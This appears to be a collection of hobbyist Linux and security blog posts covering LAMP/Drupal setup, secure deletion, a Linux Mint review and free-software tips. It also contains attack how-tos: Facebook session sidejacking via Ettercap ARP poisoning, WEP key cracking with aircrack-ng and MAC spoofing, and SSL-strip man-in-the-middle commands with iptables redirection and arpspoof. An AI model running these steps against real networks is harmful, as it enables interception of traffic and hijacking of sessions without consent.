Sidejacking with Hamster & Ferret

Hamster is a tool for HTTP session hijacking with passive sniffing. It eavesdrops on a network, captures the session cookies, then imports them into the browser to allow you to hijack their session.

In this tutorial im using Ettercap for arpcache poisoning and H&F for stealing a session on Facebook.

Ubuntu 10.04 - Lamp server - Drupal

Drupal, is one of the leading open-resource Content Management Systems and it is the technology that has turned into a favored range of numerous organizations worldwide.

Drupal provides numerous fantastic functions, and it is the principle logic behind why a lot of leading website pages tends to be operating on the Drupal power these days. There are several providers employed in the area associated with Drupal Development Services as well as rendering expert services centered all over Drupal. Included in this are services which include Drupal installation, Drupal improvement, Drupal template, Drupal module development, Drupal consultancy, and many others.

A couple of famous drupal sites :

CNN

The New York State Senate

MENSA

The White House

Install Ubuntu server-MYSQL-PHP-APACHE

Requirements :

Ubuntu 10.04 LTS Server
Internet connection

First thing you need to do is to download the ISO file from Ubuntu's homepage, click on the link above and chose your edition. Burn the ISO on a cd and reboot, Or you could try it out with Virtualbox first.

This is what you'll see after you've booted it up.

Press Install Ubuntu Server and follow the guide which is very easy.

You will be asked to install automatic security updates which i would recommend.

Press space on [ ] LAMP server.

After your done your gonna get this screen. Enter the login name and password you chose during the installation.

To try if PHP works :

cd /var/www/
sudo nano phptest.php

insert this line into the file and save it.

after that type ifconfig to see your ip adress.

connect to the page from another computer connected to the inet. at http://ipadress/phptest.php and you should see something like image above. And you can test if your apache works by http://ipadress/

optional..

[-.,.-*''*-.,,.-*''*-.,,.->

install a ssh server :

sudo apt-get install openssh-server
sudo /etc/init.d/ssh restart

ftp server:

sudo apt-get install vsftpd
sudo service vsftpd restart

the configuration file is in /etc/vsftpd.conf

webmin:

wget http://www.webmin.com/download/deb/webmin-current.deb

wget http://mirrors.kernel.org/ubuntu/pool/universe/libm/libmd5-perl/libmd5-perl_2.03-1_all.deb

sudo apt-get install perl libnet-ssleay-perl openssl libauthen-pam-perl libpam-runtime libio-pty-perl

sudo dpkg -i libmd5-perl_2.03-1_all.deb

sudo dpkg -i webmin_1.510_all.deb

connect to it by going to https://ipadress:10000/
change the PHP configuration to the path /etc/php5/apache2/

For security reasons i would recommend that you stop the ftp/ssh/webmin services after your done using them.

sudo /etc/init.d/ssh stop
sudo service vsftpd stop
sudo /etc/init.d/webmin stop


then use start instead of stop to start them again when you need to

[-.,.-*''*-.,,.-*''*-.,,.->

 

Useful paths & command lines :

sudo - ("su" "do") execute command and superuser.
/var/www/ - your web folder.
top - checks your cpu mem and so on..
cd - change directory.
rm - remove files.
ls - list files.
clear - clear screen.
chmod - changes access modes.
apt-get - Deb/Ubuntu software packages.
/etc/init.d/apache2 restart - restart the apache server.
service mysql restart - restart mysql server.

- [ Erasing files / hd's beyond recovery ] -

Whether your selling your computer, have a hacker girlfriend, superparanoid or just want to delete your knowledge and information about UFOs beyond recovery just deleting it wont do it.

To delete a single file use the tool Shred which usually comes preinstalled on most distributions.

Shred 'options' [filename]

options are:
-n ( number of times you want to overwrite )
-u ( remove the file after its done )
-z ( overwrite the file with only zeros to hide that it was shredded )

Example:

shred -u -z -n 10 area51.txt

if your even more paranoid and want to remove stuff from RAM and or Swap try using The Secure Delete Tools. On a Debian based system use:

sudo apt-get install secure-delete

[-.,.-*''*-.,,.-*''*-.,,.->

And so if you want to delete your entire drive download DBAN, burn and boot it up.

You will get a couple of options, i would recommend going with ENTER.

press space to chose the HD(s) you want to erase.

After that press M chose the method you want to use to erase.

For most people a quick erase is enough and will not be able to be recovered, remember that even the quick erase take loads of time. So unless you found out who shot JFK and stored the information on your computer go with something fast.

- [ Linux Mint 9 "Isadora" RC ] -

I decided to try out the new Linux Mint 9 "Isadora" RC release. Installation is easy as usually with Mint, nice and fast. Looks pretty similar to the previous release.

On first boot you'll notice the really fast bootup time it takes. The looks and feel are pretty much the same as before. System seems to be working really fast and stable.

Honestly not much to say about this distro but that it really works well, fast and stable. And in my opinion is a perfect build for someone who wants to give Linux a try for the first time or any other desktop users out there. Please remember that this is still the RC release and there might be buggy. I dont know if i think the new Software Manager is better or worse, one thing i really liked was the software description.

Mint try to make things work out of the box which is pretty nice for people who don't know how or don't wanna be bothered with complicated driver installations such as Wifi cards, graphic drivers, multimedia codec's etc.

New features are as follows :

• New Software Manager
  
  • 30,000 packages
  • Review applications straight from the Software Manager
  • APT daemon
  • Visual improvements
• New Backup Tool
  
  • Incremental backups, compression, integrity checks
  • Backup/Restoration of the software selection
• Menu improvements
  
  • Editable items
  • Transparent menu
  • Always start with favorites
  • “Add to” shortcuts
• Desktop settings
  
  • Changes apply immediately
  • Additional options
• Better look & feel
  
  • Backgrounds
  • Welcome screen
  • Update Manager
• System improvements
  
  • Windows installer
  • Husse quotes
  • USB Creator
  • Default software selection
  • Local repository and Gnome-PPP
  • Apt hold/unhold/held commands
• Project changes
  
  • Community Website
  • CD & DVD
  • Community Editions
  • OEM installation disks
  • USA/Japan distributors disks
  • 32 & 64-bit
• Upstream improvements
  
  • Faster boot
  • Long Term Support

System requirements:

• x86 processor (for both 32 & 64-bit versions)
• x86_64 compatible processor (for the 64-bit version)
• 512 MB of system memory (RAM)
• 3 GB of disk space for installation
• Graphics card capable of 800×600 resolution
• CD-ROM drive or USB port

Download links:

Download Linux Mint 9 RC i386
Download Linux Mint 9 RC amd64

- [ Delete your facebook account! how-to ] -

TERMINATE YOUR ACCOUNT NAO!

Facebook is a great social community site allowing people to get in contact with friends, family and people they have not seen in a long time. However there are reasons for wanting to delete your account. People often complain that they don't want there privacy to be known to the public or governments, people have stalkers following them and it has even happened that people have lost there jobs because of it. Now you can deactivate your account pretty easily but what it you want it permanently gone?

First thing you should do is to Delete everything on your facebook site. Pictures, messages, feeds, groups, friends.. EVERYTHING. If you don't do this it will be backed-up on Facebook indefinitely.

Then you contact the facebook staff :

privacy@facebook.com
comment-info-rt@facebook.com
info@facebook.com
(try one of these and you should get a reply within a week.)

After you have been given a reply from the staff you can log in to see if you don't get a ' Reactivate your account '. If you don't congratulations your done.

- [ Nikto2 - Web Scanner ] -

This is a tool i really enjoy, Nikto2, a web server scanner which performs comprehensive tests against web servers for multiple items, including over 6100 potentially dangerous files/CGIs, checks for outdated versions of over 950 servers, and version specific problems on over 260 servers.

On a Debian based system you can download it typing:
sudo apt-get install nikto

or install from there website on :
http://cirt.net/Nikto2

when you are done just type :
nikto -h www.example.com    //example.com being the adress you wanna search.

You can type sudo nikto -update, to update to the latest databases and plugins. And if you want to enable a proxy goto etc/nikto/config.txt and change the proxy settings.

Nikto2 can be a very valuable tool for web designers, pen testers and many others. A special thanks to Chris Sullo and David Lodge for developing this tool.

// Think Free -  Think Linux

- [ A few free software tips ] -

Image / 3D :

GIMP - Image editor
Paint.net -Image editor
IrfanView - Image viewer
Picasa - Image viewer
Blender - 3D rendering

notes:
GIMP is probably one of the best free graphic tools out there, if you are used to Photoshop you could always try GIMPShop to get the Photoshop look and feel.

Office :

OpenOffice - Office suite
Adobe Reader - Pdf reader
PDFCreator - Pdf creator
Sunbird - Calendar

notes:
I would definitely recommend OpenOffice for anyone, a truly amazing & free software from Sun Microsystems/ Oracle, Can read and export files like Microsoft Office.

Archive Managers:

7-Zip - Compression manager
Universal Extractor - file extractor
Rar - Compression manager
Unrar (found in linux package manager.)

Antivirus :

AVG free - Antivirus
Anti Vir - Antivirus
Avast - Antivirus
BitDefender - Antivirus
ClamWin - Antivirus

notes:
Do yourself a favor and get a Unix based operating system and get rid of the antivirus crap.

Internet :

Firefox - Web browser
Opera - Web browser
Chrome - Web browser
Avant Browser - Web browser
Thunderbird - Email client
WGET - Download manager
HTTrack - Offline browser

notes:
In my opinion Firefox is the ultimate web browser at the moment with its thousands of addons and themes, great security features. If you want a nice fast browser you should look into Opera or Google Chrome.

Security Tools :

Wireshark - Package reader
Metasploit - Framework
Kismet - Wireless scanner
Cain and Abel - Network / Password utility
Ettercap - Network utility
Nikto2 - Web server scanner
Aircrack-ng - Wireless utilities
Hping 2 and 3 - TCP/IP utility
Nmap - Port scanner

OS:

Debian
Ubuntu - Kubuntu
Mint
Fedora
Slackware
Gentoo
FreeBSD
CentOS
PCLinuxOS

Video :

VLC - Video player (codecs included)
Media Player Classic - Video Player
Zoom Player - Video Player
GOM Player - Video Player

- [ WEP key recovery ] -

Things needed for this:

Aircrack-ng ( http://www.aircrack-ng.org/ )
A wireless adapter with packet injection capability.

airmon-ng
airmon-ng stop ‘interface’
macchanger -r ‘interface’
airmon-ng start ‘interface’

airodump-ng ‘interface’
airodump-ng -c ‘channel’ –bssid ‘bssidnr’ -w ‘file output’ ‘interface’

aireplay-ng -1 0 a ‘bssid’ -h ‘your mac adress’ -e ‘essid’ ‘interface’
aireplay-ng -3 -b ‘bssid’ -h ‘your mac adress’ ‘interface’

// Make sure to get around 20-40 thousand packets before you crack the code.

aircrack-ng -b ‘bssid’ ‘file output’















should look something like this when your done.

PS.
This is ment for your own WEP. Dont attack other people.

- [ SSL strip how-to ] -

MITM- attack with SSL-Strip // basically strips out the ssl from the page

Requirements :
Python >= 2.4
Python's Twisted Web
http://www.thoughtcrime.org/software/sslstrip/
A Unix based system


echo "1" > /proc/sys/net/ipv4/ip_forward

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port

sslstrip.py -l

arpspoof -i -t

Ps.

This is for educational purposes only.


This video demonstrates using SSL-strip with Ettercap. Please use fullscreen for a better view.